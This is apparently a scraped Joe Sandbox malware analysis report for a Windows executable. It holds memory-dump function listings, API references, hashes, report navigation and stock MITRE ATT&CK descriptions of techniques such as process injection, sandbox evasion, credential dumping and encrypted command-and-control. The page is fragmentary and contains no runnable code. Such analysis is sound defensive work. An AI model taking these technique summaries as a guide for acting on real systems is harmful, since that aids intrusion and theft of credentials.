RtlAllocateHeap.NTDLL ref: 00000188240D3845
NtAcceptConnectPort.NTDLL ref: 00000188240D392F
NtAcceptConnectPort.NTDLL ref: 00000188240D39BC
NtAcceptConnectPort.NTDLL ref: 00000188240D3A7B
RtlDeleteBoundaryDescriptor.NTDLL ref: 00000188240D3A98
RtlDeleteBoundaryDescriptor.NTDLL ref: 00000188240D3AAA

Memory Dump Source

Source File: 00000001.00000003.413731295.00000188240D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000188240D0000, based on PE: false

Similarity

API ID: AcceptConnectPort$AllocateBoundaryDeleteDescriptorHeap
String ID:
API String ID: 3472209132-0
Opcode ID: d559bc2f96c6d5c528e7a5e9e6e531c52d8b5c051237d51d97aba31510731f62
Instruction ID: 7defd7f59904d5ea7a75672867774e28a73c8858150bdb2528d6726dc5c48f35
Opcode Fuzzy Hash: d559bc2f96c6d5c528e7a5e9e6e531c52d8b5c051237d51d97aba31510731f62
Instruction Fuzzy Hash: C6C17630618B098FDB98EF1CC485BA9B7E1FB98310F40852DE48AC7256DF75D989CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00000188240D3388 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 344memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00000188240D34FF
RtlAllocateHeap.NTDLL ref: 00000188240D3652
RtlDeleteBoundaryDescriptor.NTDLL ref: 00000188240D36D1

Strings

l, xrefs: 00000188240D33AE

Memory Dump Source

Source File: 00000001.00000003.413731295.00000188240D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000188240D0000, based on PE: false

Similarity

API ID: AllocateHeap$BoundaryDeleteDescriptor
String ID: l
API String ID: 2279964584-2517025534
Opcode ID: 945787e355e9cefb289f3126088299a2a592093c218b6f331fdd883cb8990c47
Instruction ID: f376a6967b4c4764cb55ed72de5d030bef890db95d486d25b947bf04d0d2dc2b
Opcode Fuzzy Hash: 945787e355e9cefb289f3126088299a2a592093c218b6f331fdd883cb8990c47
Instruction Fuzzy Hash: C1A147316086588BD769AE2C88C16FA77F2FB94310F50866DE4C7C3183DD35DA8AC791

Uniqueness

Uniqueness Score: -1.00%

Function 00000188240D536C Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00000188240D53BD

Memory Dump Source

Source File: 00000001.00000003.413731295.00000188240D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000188240D0000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8f0f157fb83daee5cb6c9520c57f82bef06885daf9e14b2ffd789235ee1ccf1c
Instruction ID: 683aa23bd67a82f13b03613ccb2f632e8975642be46692ca006019865a734298
Opcode Fuzzy Hash: 8f0f157fb83daee5cb6c9520c57f82bef06885daf9e14b2ffd789235ee1ccf1c
Instruction Fuzzy Hash: 41017131610A059BE7A89B2CD8C87BA73F2F758321F54462AA805C3281DF75EDD5C790

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 09212399.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Windows Analysis Report
09212399.exe

Function 004018FB Relevance: 36.3, APIs: 24, Instructions: 320
memoryregistryfileCOMMON

Function 0040250D Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 193
memorynativesynchronizationCOMMON

Function 0040159B Relevance: 16.8, APIs: 11, Instructions: 292
memorynativeCOMMON

Function 0040203B Relevance: 1.5, APIs: 1, Instructions: 29
nativeCOMMON

Function 00402397 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128
memoryCOMMON

Function 00414DB1 Relevance: 7.5, APIs: 5, Instructions: 37
threadCOMMON

Function 00402750 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9
COMMON

Function 00401F1A Relevance: 3.1, APIs: 2, Instructions: 64
memoryCOMMON

Function 00417C58 Relevance: 3.0, APIs: 2, Instructions: 34
memoryCOMMON

Function 00416177 Relevance: 3.0, APIs: 2, Instructions: 26
memoryCOMMON

Function 0040231F Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Function 004011A4 Relevance: 1.5, APIs: 1, Instructions: 7
memoryCOMMON

Function 004011BA Relevance: 1.5, APIs: 1, Instructions: 7
memoryCOMMON

Function 004179F7 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 90
libraryloaderCOMMON

Function 00414BB6 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 134
COMMON

Function 0041A38E Relevance: 7.6, APIs: 5, Instructions: 92
memoryCOMMON

Function 00419F6D Relevance: 7.5, APIs: 5, Instructions: 32
timethreadCOMMON

Function 0041A4F9 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Function 00416214 Relevance: .1, Instructions: 77
COMMONCrypto

Function 0041576F Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 115
fileCOMMON

Function 00419FD3 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 97
COMMON

Function 00401DFD Relevance: 24.6, APIs: 2, Strings: 12, Instructions: 80
COMMON

Function 00414F69 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 71
libraryloadermemoryCOMMON

Function 004010BC Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 90
memorystringCOMMON

Function 004192C0 Relevance: 16.8, APIs: 11, Instructions: 299
COMMON

Function 00419CDF Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 228
COMMON

Function 0041A53C Relevance: 12.2, APIs: 8, Instructions: 169
COMMON

Function 00415DB5 Relevance: 12.1, APIs: 8, Instructions: 131
COMMON

Function 00419078 Relevance: 9.1, APIs: 6, Instructions: 145
COMMON

Function 004155A8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Function 004011D0 Relevance: 7.8, APIs: 5, Instructions: 311
memoryCOMMON

Function 004189BE Relevance: 7.7, APIs: 5, Instructions: 184
COMMON

Function 00415ED7 Relevance: 7.7, APIs: 5, Instructions: 172
COMMON

Function 0041A11B Relevance: 7.6, APIs: 5, Instructions: 150
COMMON